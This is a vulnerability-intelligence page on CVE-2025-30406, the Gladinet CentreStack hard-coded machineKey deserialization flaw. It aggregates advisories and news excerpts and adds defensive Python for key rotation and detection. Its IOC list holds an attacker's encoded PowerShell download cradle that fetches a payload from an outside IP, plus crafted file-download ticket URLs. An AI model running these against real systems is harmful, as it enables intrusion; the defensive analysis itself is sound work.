CVE-2025-30406
Published: 2025-04-03
Priority: P1 (98) · Severity: critical · CVSS 3.1 base score: 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability, remediation due 2025-04-29
Exploited in the wild
EPSS: 92.73% (99.8th percentile)
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution. NOTE: a CentreStack admin can manually delete the machineKey defined in portal\web.config.
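The mitigation in the NOTE is a one-element change to portal\web.config, but the reason it works is worth seeing: a literal validationKey/decryptionKey shipped in a product is shared by every install, so anyone who has read one copy can sign ViewState for all of them. The Python below is an added example, not Gladinet's code or configuration. It audits a web.config for a pinned machineKey and shows the two ways to take the shared key away: deleting the element, as the advisory text says, or rotating to deployment-unique random keys, which a load-balanced farm needs because auto-generated keys differ per server. The config fragment and its all-zero key values are constructed placeholders, not the real CentreStack keys.

```python
"""Audit and harden a CentreStack-style portal\\web.config machineKey.

Added example (not Gladinet's code). WEAK_CONFIG is a constructed fragment;
its key values are placeholders, not the product's real hard-coded keys.
"""
import os
import xml.etree.ElementTree as ET

WEAK_CONFIG = """<configuration>
  <system.web>
    <machineKey validationKey="0000000000000000000000000000000000000000000000000000000000000000"
                decryptionKey="00000000000000000000000000000000"
                validation="HMACSHA256" decryption="AES" />
    <compilation debug="false" targetFramework="4.8" />
  </system.web>
</configuration>"""


def find_static_machine_keys(config_xml):
    """Return [(attribute, value)] for every machineKey attribute that pins a
    literal key instead of AutoGenerate. A literal key is only acceptable when
    it was generated for this deployment; one copied from a vendor build is
    shared with every other install (CWE-321)."""
    root = ET.fromstring(config_xml)
    findings = []
    for mk in root.iter("machineKey"):
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "AutoGenerate,IsolateApps")
            if not value.startswith("AutoGenerate"):
                findings.append((attr, value))
    return findings


def remove_machine_key(config_xml):
    """The mitigation the advisory text describes: delete <machineKey> so
    ASP.NET falls back to per-machine auto-generated keys. Those keys differ
    per server, so a web farm needs rotate_machine_key() instead."""
    root = ET.fromstring(config_xml)
    for parent in list(root.iter()):
        for child in list(parent):
            if child.tag == "machineKey":
                parent.remove(child)
    return ET.tostring(root, encoding="unicode")


def rotate_machine_key(config_xml):
    """Replace the keys with fresh random ones, hex-encoded as ASP.NET expects:
    64 bytes for HMACSHA256 validation, 32 bytes for AES-256 decryption.
    Anyone holding the old shared key can no longer forge ViewState."""
    root = ET.fromstring(config_xml)
    for mk in root.iter("machineKey"):
        mk.set("validationKey", os.urandom(64).hex().upper())
        mk.set("decryptionKey", os.urandom(32).hex().upper())
        mk.set("validation", "HMACSHA256")
        mk.set("decryption", "AES")
    return ET.tostring(root, encoding="unicode")


if __name__ == "__main__":
    for attr, value in find_static_machine_keys(WEAK_CONFIG):
        print(f"pinned {attr}: {value[:16]}...")
    print("after removal :", find_static_machine_keys(remove_machine_key(WEAK_CONFIG)))
    rotated = dict(find_static_machine_keys(rotate_machine_key(WEAK_CONFIG)))
    print("after rotation:", {k: len(v) for k, v in rotated.items()}, "hex chars")
```

Either change invalidates ViewState that clients already hold, so expect one round of failed ViewState integrity checks from legitimate sessions at the changeover; run it during a maintenance window and recycle the application pool afterwards. Neither change undoes code that already ran: a server that exposed the shared key to the internet before patching still needs the process-tree and file hunts from the Detection section.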
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| gladinet | centrestack | < 16.4.10315.56368 | 16.4.10315.56368 |
Detection & IOCs (extracted from sources)
Indicators:
- command: "C:\Windows\System32\cmd.exe" /c powershell -e SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEAOQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0ATwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQA=
- url: /storage/filesvr.dn?t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu
- url: /storage/filesvr.dn?t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsukOQzFIwOzIHswJBdS7w0RY
- url: /storage/filesvr.dn?t=t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7Dsd3P5l6eiYyDiG8Lvm0o41m4mxEjYeJuI6Nk:xBHQQ1c6Hzjx3OsG4T044CP5qZ9Qr
Detection guidance:
- Monitor the Windows Application Event Log for Event ID 1316, which captures ViewState deserialization attack payloads (base64-encoded) submitted to the CentreStack portal.
- Alert on child process creation from w3wp.exe spawning cmd.exe or powershell.exe, which indicates server-side code execution via ViewState deserialization.
- Detect HTTP GET requests to /storage/filesvr.dn with a 't' parameter containing long base64-like encrypted ticket strings; these are exploitation attempts to download web.config via the hardcoded AES key.
- Flag access tickets in /storage/filesvr.dn requests that decrypt to a timestamp in the year 9999, indicating a crafted never-expiring ticket used by attackers to persistently download web.config.
- Hunt for the file C:\programdata\CentreStac_log.txt on CentreStack servers, which attackers created to exfiltrate ipconfig /all output via the LFI vulnerability.
Analyst notes:
- The conqueror.exe payload (SHA256: e9fa82d92d826c6a1c38165fe6bd610d3b80cd5d53ec65ac3fe94393be64b5a5) was not present on the file system for further analysis and was not found on VirusTotal at time of writing; the C2 server at 185.196.11.207:8000 was also offline, limiting further artifact recovery.
- Attribution to the cl0p ransomware group for the December 15 incidents could not be definitively confirmed at time of reporting; Huntress flagged it as suspected based on timing of external intelligence reports.
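The guidance above names four observable shapes: a forged __VIEWSTATE in a portal POST, the IIS worker w3wp.exe spawning a shell, an encoded PowerShell download cradle, and an over-long filesvr.dn ticket. The Python below is an added example, not code from Huntress, Gladinet or any other source on this page, that turns those shapes into checks a SOC can run over request bodies and process-creation records. It reuses the encoded command and the first filesvr.dn URL from the indicator list; the HTTP bodies and the process record are constructed, the forged ViewState is only a payload envelope (not a working gadget chain), and the 64-character ticket-length threshold is an assumption to tune against real traffic. It goes one step beyond the Suricata rule further down the page: it base64-decodes the ViewState before looking for the BinaryFormatter header, so the header is found in any of the three base64 alignments rather than the one the rule's pcre spells out.

```python
"""Triage helpers for the CVE-2025-30406 indicators listed above.

Added example; not code from Huntress, Gladinet or any source on this page.
The encoded PowerShell command and the first /storage/filesvr.dn URL are
copied from the indicator list; every HTTP body and process record below is
constructed for the example.
"""
import base64
import binascii
import re
from urllib.parse import parse_qs, urlencode, urlsplit

# Header of a typical .NET BinaryFormatter stream (SerializationHeaderRecord):
# record type 0x00, RootId=1, HeaderId=-1, MajorVersion=1, MinorVersion=0.
# ysoserial.net-style ViewState gadget payloads carry such a stream inside the
# ObjectStateFormatter envelope. Decoding first finds it in any base64 alignment.
BINARYFORMATTER_HEADER = bytes.fromhex("00" "01000000" "ffffffff" "01000000" "00000000")
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def viewstate_embeds_binaryformatter(form_body):
    """True if __VIEWSTATE in a POST body decodes to a blob containing a
    BinaryFormatter header, i.e. a forged deserialization payload."""
    for value in parse_qs(form_body, keep_blank_values=True).get("__VIEWSTATE", []):
        try:
            blob = base64.b64decode(value + "=" * (-len(value) % 4))
        except (binascii.Error, ValueError):
            continue  # not base64 at all: not this attack, let other rules judge
        if BINARYFORMATTER_HEADER in blob:
            return True
    return False


def suspicious_filesvr_ticket(url, min_len=64):
    """GET /storage/filesvr.dn?t=<long opaque ticket>: the request shape the
    sources describe for pulling web.config with the hard-coded AES key.
    Assumption (tune to your traffic): legitimate tickets are shorter."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/storage/filesvr.dn"):
        return False
    return any(len(t) >= min_len and re.fullmatch(r"[A-Za-z0-9+/=:|%_-]+", t)
               for t in parse_qs(parts.query).get("t", []))


def web_worker_spawned_shell(event):
    """Process-creation record (Sysmon/EDR-style dict) in which the IIS worker
    w3wp.exe spawns a shell: code ran inside the web application."""
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    child = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    return parent == "w3wp.exe" and child in SHELLS


def decode_encoded_powershell(command_line):
    """Decode `powershell -e|-ec|-en|-enc|-EncodedCommand <base64>`, which
    PowerShell reads as UTF-16LE. Returns None when no such switch is present."""
    m = re.search(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


# --- sample input: copied from this page's indicator list -------------------
IOC_COMMAND = (
    r'"C:\Windows\System32\cmd.exe" /c powershell -e '
    "SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcAA6AC8ALwAxADgANQAuADEA"
    "OQA2AC4AMQAxAC4AMgAwADcAOgA4ADAAMAAwAC8AYwBvAG4AcQB1AGUAcgBvAHIALgBlAHgAZQAgAC0A"
    "TwB1AHQARgBpAGwAZQAgAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwAYwBvAG4AcQB1AGUA"
    "cgBvAHIALgBlAHgAZQA="
)
IOC_URL = ("/storage/filesvr.dn?t=vghpI7EToZUDIZDdprSubL3mTZ2:aCLI:8Zra5AOPvX4TEEXlZiueqNysfRx7"
           "Dsd3P5l6eiYyDiG8Lvm0o41m:ZDplEYEsO5ksZajiXcsumkDyUgpV5VLxL%7C372varAu")
# --- constructed records -----------------------------------------------------
EVENT = {"ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
         "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": IOC_COMMAND}
# Benign ObjectStateFormatter stream (0xFF 0x01 version marker, a few tokens,
# fake 20-byte MAC) versus a forged envelope wrapping a BinaryFormatter stream.
_BENIGN = b"\xff\x01\x0f\x0f\x05\x08HomePage\x64" + b"\x00" * 20
_FORGED = b"\xff\x01\x32\x40" + BINARYFORMATTER_HEADER + b"\x0c\x02\x00\x00\x00" + b"A" * 32 + b"\x00" * 20
BODY_BENIGN = urlencode([("__LASTFOCUS", ""), ("__VIEWSTATE", base64.b64encode(_BENIGN).decode())])
BODY_FORGED = urlencode([("__LASTFOCUS", ""), ("__VIEWSTATE", base64.b64encode(_FORGED).decode())])

if __name__ == "__main__":
    print("forged ViewState:", viewstate_embeds_binaryformatter(BODY_FORGED))
    print("benign ViewState:", viewstate_embeds_binaryformatter(BODY_BENIGN))
    print("filesvr ticket  :", suspicious_filesvr_ticket(IOC_URL))
    print("w3wp -> shell   :", web_worker_spawned_shell(EVENT))
    print("decoded command :", decode_encoded_powershell(EVENT["CommandLine"]))
```

The decoded command is the same download cradle the Huntress notes describe (Invoke-WebRequest to 185.196.11.207:8000 for conqueror.exe, written to C:\Users\Public), so the decoder gives an analyst the URL and drop path without leaving the console. The ViewState check is the one to wire into a WAF or reverse-proxy log pipeline: a legitimate ObjectStateFormatter page state almost never carries a BinaryFormatter graph, while every ysoserial.net ViewState gadget does.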
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.1 | 9.8 | CRITICAL | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | | 9.8 | CRITICAL | |
| cisa | | 9.8 | CRITICAL | |
CISA
Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
cisa·2025-04-08·CVSS 9.8
CVE-2025-30406 [CRITICAL] CWE-321 Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
Vulnerability: Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
Affected: Gladinet CentreStack
Gladinet CentreStack and Triofox contain a use of hard-coded cryptographic key vulnerability in the way that the application manages keys used for ViewState integrity verification. Successful exploitation allows an attacker to forge ViewState payloads for server-side deserialization, allowing for remote code execution.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2005.pdf ; https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/secu
GHSA
GHSA-hgp9-3v5v-223j: Gladinet CentreStack through 16
ghsa_unreviewed·2025-04-03
CVE-2025-30406 [CRITICAL] CWE-321 GHSA-hgp9-3v5v-223j: Gladinet CentreStack through 16
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, which enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution. NOTE: the CentreStack admin can manually delete the machineKey defined in portal\web.config.
VulnCheck
Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
vulncheck·2025·CVSS 9.0
CVE-2025-30406 [CRITICAL] CWE-321 Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
Gladinet CentreStack and Triofox Use of Hard-coded Cryptographic Key Vulnerability
Gladinet CentreStack and Triofox contain a use of hard-coded cryptographic key vulnerability in the way that the application manages keys used for ViewState integrity verification. Successful exploitation allows an attacker to forge ViewState payloads for server-side deserialization, allowing for remote code execution.
Affected: Gladinet CentreStack
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://gladinetsupport.s3.us-east-1.amazonaws.com/gladinet/securityadvisory-cve-2025-triofox.pdf; https://www.cve.org/CVERecord?id=CVE-2025-30406; http
VulnCheck
CrushFTP Authentication Bypass Vulnerability
vulncheck·2025·CVSS 9.8
CVE-2025-31161 [CRITICAL] CWE-305 CrushFTP Authentication Bypass Vulnerability
CrushFTP Authentication Bypass Vulnerability
CrushFTP contains an authentication bypass vulnerability in the HTTP authorization header that allows a remote unauthenticated attacker to authenticate to any known or guessable user account (e.g., crushadmin), potentially leading to a full compromise.
Affected: CrushFTP CrushFTP
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2025-31161; https://x.com/Shadowserver/status/1906753539499520064; https://arcticwolf.com/resources/blog/cve-2025-31161/; https://outpost24.com/blog/crushftp-auth-bypas
Suricata
ET WEB_SERVER Gladinet CentreStack & Triofox Remote Code Execution via Server-side Deserialization with Hardcoded machineKey (CVE-2025-30406)
suricata·2025-04-24·CVSS 9.0
CVE-2025-30406 [CRITICAL] ET WEB_SERVER Gladinet CentreStack & Triofox Remote Code Execution via Server-side Deserialization with Hardcoded machineKey (CVE-2025-30406)
ET WEB_SERVER Gladinet CentreStack & Triofox Remote Code Execution via Server-side Deserialization with Hardcoded machineKey (CVE-2025-30406)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SERVER Gladinet CentreStack & Triofox Remote Code Execution via Server-side Deserialization with Hardcoded machineKey (CVE-2025-30406)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/portal/loginpage.aspx"; fast_pattern; http.header; content:"cmd|3a 20|"; http.request_body; content:"__LASTFOCUS|3d|"; content:"__VIEWSTATE|3d|"; pcre:"/^[^&]*?AAQAAAP(?:\x2f|\x252F){4}8BAAAAAAAAAAwCAAAA/Ri"; reference:url,github.com/W01fh4cker/CVE-2025-30406; reference:cve,2025-30406; classtype:web-application-attack; sid:2061836; rev:1; metadata:attack_target Server, tls_state TLSDec
Metasploit
Gladinet CentreStack/Triofox Path Traversal
metasploit·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet CentreStack/Triofox Path Traversal
Gladinet CentreStack/Triofox Path Traversal
This module exploits a path traversal vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox that allows an unauthenticated attacker to read arbitrary files from the server's file system. The vulnerability exists in the `/storage/t.dn` endpoint which does not properly sanitize the `s` parameter, allowing path traversal attacks. This can be used to read sensitive files such as Web.config which contains the machineKey used for ViewState deserialization attacks (CVE-2025-30406). Gladinet CentreStack versions up to 16.10.10408.56683 are vulnerable. Gladinet Triofox versions up to 16.10.10408.56683 are vulnerable.
Metasploit
Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
metasploit
Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
Gladinet CentreStack/Triofox ASP.NET ViewState Deserialization
A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker to forge ViewState data. This can lead to unauthorized actions such as remote code execution. Both applications make use of a hardcoded machineKey in the IIS web.config file, which is responsible for securing ASP.NET ViewState data. If an attacker obtains the machineKey, they can forge ViewState payloads that pass integrity checks. This can result in ViewState deserialization attacks, potentially leading to remote code execution (RCE) on the web server. Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368). Gladinet Triofox versions up to 16.4.10317.5
Nuclei
Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
nuclei·CVSS 9.8
CVE-2025-30406 [CRITICAL] Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcoded machineKey use, as exploited in the wild in March 2025. This enables threat actors (who know the machineKey) to serialize a payload for server-side deserialization to achieve remote code execution.
Template:
id: CVE-2025-30406
info:
name: Gladinet CentreStack < 16.4.10315.56368 Use of Hard-coded Key Leads to Unauthenticated RCE
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Gladinet CentreStack through 16.1.10296.56315 (fixed in 16.4.10315.56368) has a deserialization vulnerability due to the CentreStack portal's hardcod
Huntress
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
blogs_huntress·2025-12-18
Active Exploitation of Gladinet CentreStack/Triofox Insecure Cryptography Vulnerability
Acknowledgments: Special thanks to John Hammond for his contributions to this investigation and write-up.
Update #2: 12/18/25 @ 6pm ET
We’ve seen reports from other intelligence firms that note that the cl0p ransomware group is targeting internet-facing Gladinet CentreStack servers. It is still early and we can’t fully confirm if this behavior definitively stems from cl0p. However, we continue to monitor for potential Gladinet exploitation. Most recently, we observed two new incidents on December 15.
Based on the available telemetry, both of these incidents involved suspected Gladinet CentreStack exploitation.
As seen in Figure 1 below, both incidents involved the same indicators involving a PowerShell command, which was executed via w3wp.exe:
"C:\Windows\System32\cmd.exe" /c powers
Bleepingcomputer
Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
blogs_bleepingcomputer·2025-12-11·CVSS 9.0
[CRITICAL] Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
## Hackers exploit Gladinet CentreStack cryptographic flaw in RCE attacks
## Bill Toulas
Hackers are exploiting a new, undocumented vulnerability in the implementation of the cryptographic algorithm present in Gladinet's CentreStack and Triofox products for secure remote file access and sharing.
By leveraging the security issue, the attackers can obtain hardcoded cryptographic keys and achieve remote code execution, researchers warn.
Although the new cryptographic vulnerability does not have an official identifier, Gladinet notified customers about it and advised them to update the products to the latest version, which, at the time of the communication, had been released on November 29.
The company also provided customers with a set of indicators of compromise (IoCs), indicating that
Huntress
PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182
blogs_huntress·2025-12-09·CVSS 10.0
CVE-2025-55182 [CRITICAL] PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182
TL;DR : Huntress is seeing threat actors exploit a vulnerability in React Server Components ( CVE-2025-55182 ) across several organizations in our customer base. Attackers have attempted to deploy cryptominer malware, a Linux backdoor we're tracking as PeerBlight, a reverse proxy tunnel we call CowTunnel, and a Go-based post-exploitation implant dubbed ZinFoq as part of their post-exploitation activity. We also observed a Kaiji botnet variant being distributed through this campaign. We recommend immediate patching due to the feasibility of exploitation.
## Background
On December 3, a critical-severity (CVSS 10.0) unauthenticated remote code execution vulnerability was publicly disclosed in React Server Components , with the React team recommending immediate upgrade. Dubbed “React2Shell”,
Bleepingcomputer
Gladinet fixes actively exploited zero-day in file-sharing software
blogs_bleepingcomputer·2025-10-16·CVSS 7.5
CVE-2025-11371 [HIGH] Gladinet fixes actively exploited zero-day in file-sharing software
## Gladinet fixes actively exploited zero-day in file-sharing software
## Bill Toulas
Gladinet has released security updates for its CentreStack business solution to address a local file inclusion vulnerability (CVE-2025-11371) that threat actors have leveraged as a zero-day since late September.
Researchers at cybersecurity platform Huntress disclosed the exploitation activity last week saying that the flaw was a bypass for mitigations Gladinet implemented for the deserialization vulnerability leading to remote code execution (RCE) identified as CVE-2025-30406.
The local file inclusion (LFI) vulnerability enabled attackers to read the Web.config file on fully patched CentreStack deployments, extract the machine key, and then use it to exploit CVE-2025-30406.
When Huntress alerted of
Huntress
Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw
blogs_huntress·2025-10-15·CVSS 7.5
[HIGH] Active Exploitation of Gladinet CentreStack and Triofox Local File Inclusion Flaw
Update #1: 10/15/25 @ 1pm ET
On October 14, Gladinet released version 16.10.10408.56683 of CentreStack, which includes a fix for the local file inclusion vulnerability outlined below. Huntress recommends that impacted organizations update to the latest build number as soon as possible.
As a patch has now been issued, we are also releasing further analysis of the vulnerability and exploitation activity, as detailed below. The below also includes parts of the original blog, published 10/9/25.
TL;DR: Huntress has discovered in-the-wild exploitation of an unauthenticated Local File Inclusion flaw ( CVE-2025-11371 ) in Gladinet CentreStack and Triofox products. As of the initial writing of this blog, a patch was not available in the latest versions of CentreStack and Triofox.
## Background
Bleepingcomputer
Hackers exploiting zero-day in Gladinet file sharing software
blogs_bleepingcomputer·2025-10-10·CVSS 7.5
CVE-2025-11371 [HIGH] Hackers exploiting zero-day in Gladinet file sharing software
## Hackers exploiting zero-day in Gladinet file sharing software
## Bill Toulas
Threat actors are exploiting a zero-day vulnerability (CVE-2025-11371) in Gladinet CentreStack and Triofox products, which allows a local attacker to access system files without authentication.
At least three companies have been targeted so far. Although a patch is not yet available, customers can apply mitigations.
CentreStack and Triofox are Gladinet's business solutions for file sharing and remote access that allow using a company's own storage as a cloud. According to the vendor, CentreStack "is used by thousands of businesses from over 49 countries."
## No fix, all versions affected
The zero-day vulnerability CVE-2025-11371 is a Local File Inclusion (LFI) flaw affecting the default installation and c
Huntress
Top Cyber Threat Trends of 2025 from Deepfakes, ClickFix, and ViewState Exploits
blogs_huntress·2025-10-02
Top Cyber Threat Trends of 2025 from Deepfakes, ClickFix, and ViewState Exploits
Cloudflare Turnstile challenges leading to MetaStealer. Deepfake meetings impersonating company executives, which trick employees into downloading malicious extensions. Exposed ASP.NET machine keys that open the door for ViewState deserialization attacks against company servers.
These are only a few snapshots of the techniques that threat actors have been relying on in 2025 so far. In our most recent Tradecraft Tuesday episode – The Craftiest Trends, Scams, and Tradecraft of 2025 (So Far) – John Hammond and Greg Linares with Huntress dove into the top types of tricky tradecraft that threat actors are using to target businesses.
## ClickFix: The attack we’ve seen everywhere
ClickFix has been around since last year. But in 2025, attackers continued to put new spins on the crafty social en
Huntress
Do Tigers Really Change Their Stripes?
blogs_huntress·2025-05-06·CVSS 9.8
[CRITICAL] Do Tigers Really Change Their Stripes?
Something we often hear within the cybersecurity community, and particularly within digital forensics and incident response (DFIR), is that “threat actors are always changing their tactics.” If you’re just responding to incidents and putting out fires, it might seem like that, but if you’re really looking into incidents and tracking indicators and threat actor tactics, techniques, and procedures (TTPs), you’re very likely going to see that without some significant external stimulus, such as significant differences in infrastructure design and tooling, there’s really no need for a threat actor to change their tactics.
Huntress analysts and researchers recently published information regarding two vulnerabilities. On 4 April 2025, the CrushFTP CVE-2025-31161 Auth Bypass and Post-Exploitation
Huntress
CVE-2025-30406 - Critical Gladinet CentreStack & Triofox Vulnerability Exploited In The Wild
blogs_huntress·2025-04-14·CVSS 9.8
[CRITICAL] CVE-2025-30406 - Critical Gladinet CentreStack & Triofox Vulnerability Exploited In The Wild
Special thanks to Craig Sweeney, Hayden Drummond, Michael Tigges, Tanner Filip, Jevon Ang, Jamie Dumas, Stephanie Fairless, and Lindsey Welch for their contributions and support for this writeup.
On Friday, 11 April 2025, the Huntress SOC received an alert from one of our own internal detectors known to catch 0-day exploitation.
Figure 1: Process Tree of the Powershell Payload Originating from the IIS Worker Process
While this is a simple detection to see suspicious outbound connections from an irregular child process, it indicates there may be more to uncover against the software served by the web service worker.
In this case, the suspect software was Gladinet CentreStack, which was just recently added to CISA’s Known Exploited Vulnerabilities database with CVE-2025-30406. At the time
Bleepingcomputer
CentreStack RCE exploited as zero-day to breach file sharing servers
blogs_bleepingcomputer·2025-04-09·CVSS 9.0
[CRITICAL] CentreStack RCE exploited as zero-day to breach file sharing servers
## CentreStack RCE exploited as zero-day to breach file sharing servers
## Bill Toulas
Hackers exploited a vulnerability in Gladinet CentreStack's secure file-sharing software as a zero-day since March to breach storage servers.
Gladinet CentreStack is an enterprise file-sharing and access platform that turns on-premise file servers (like Windows servers with SMB shares) into secure, cloud-like file systems supporting remote access to internal file shares, file syncing and sharing, multi-tenant deployments, and integration with Active Directory.
The company claims the product is used by thousands of businesses across 49 countries, including enterprises with Windows-based file servers, MSPs hosting file services for multiple clients, and various organizations that need cloud-like access
Wiz
CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2025-14611 [HIGH] CVE-2025-14611 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14611 :
Gladinet CentreStack vulnerability analysis and mitigation
Gladinet CentreStack and Triofox prior to version 16.12.10420.56791 used hardcoded values for their implementation of the AES cryptoscheme. This degrades security for public exposed endpoints that may make use of it and may offer arbitrary local file inclusion when provided a specially crafted request without authentication. This opens the door for future exploitation and can be leveraged with previous vulnerabilities to gain a full system compromise.
Source : NVD
Score: 7.1 (CNA score 7.1) · Severity: HIGH · Published December 12, 2025
Affected technologies: Gladinet CentreStack
Has public exploit: Yes · Has CISA KEV exploit: Yes · CISA KEV release date: N/A · CISA KEV due date: N/A
Exploitation Probability Pe
Greynoiseio
NoiseLetter April 2025
blogs_greynoiseio
NoiseLetter April 2025
Recorded Future
October 2025 CVE Landscape
blogs_recorded_future·CVSS 9.8
[CRITICAL] October 2025 CVE Landscape
# October 2025 CVE Landscape: 32 High-Impact Vulnerabilities Demand Immediate Attention
October 2025 saw a significant escalation in vulnerability activity, with Recorded Future's Insikt Group® identifying 32 high-impact vulnerabilities, double the 16 identified in September's CVE report. Twenty-six of these vulnerabilities scored as Very Critical.
What security teams need to know:
- Microsoft dominates: Eight of 32 vulnerabilities affect Microsoft products, including a critical WSUS deserialization flaw (CVE-2025-59287) now being actively exploited
- CL0P ransomware group exploited an Oracle E-Business Suite zero-day (CVE-2025-61882) for data theft and extortion campaigns
- Legacy vulnerabilities persist: Five of the 14 RCE-enabling vulnerabilities are over a decade old, highlighting c
Timeline
- 2025-04-03: Published
- 2025-04-08: Added to CISA KEV
- Exploited in the wild